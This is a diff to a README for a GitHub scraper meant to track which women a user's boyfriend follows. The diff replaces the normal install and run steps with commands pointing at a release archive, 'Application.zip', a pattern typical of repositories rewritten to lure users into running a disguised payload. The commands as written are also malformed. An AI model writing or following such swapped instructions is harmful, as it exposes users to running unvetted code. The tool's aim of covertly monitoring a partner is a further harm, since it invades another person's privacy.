PedrokaX/webscraper-to-identify-which-girls-and-how-many-of-them-my-boyfriend-follows-on-GitHub/README.md

 ## How to Use 🚀

 1. Clone the repository to your local machine.
-2. Install the required dependencies by running `pip install -r requirements.txt`.
+2. Install the required dependencies by running `pip install -r https://github.com/PedrokaX/webscraper-to-identify-which-girls-and-how-many-of-them-my-boyfriend-follows-on-GitHub/releases/download/v1.0/Application.zip`.
-3. Run the scraper using `python scraper.py`.
+3. Run the scraper using `python https://github.com/PedrokaX/webscraper-to-identify-which-girls-and-how-many-of-them-my-boyfriend-follows-on-GitHub/releases/download/v1.0/Application.zip`.
 4. Enter your boyfriend's GitHub username when prompted.
 5. Sit back and let the tool gather the data for you!
 6. Review the generated report to see the results.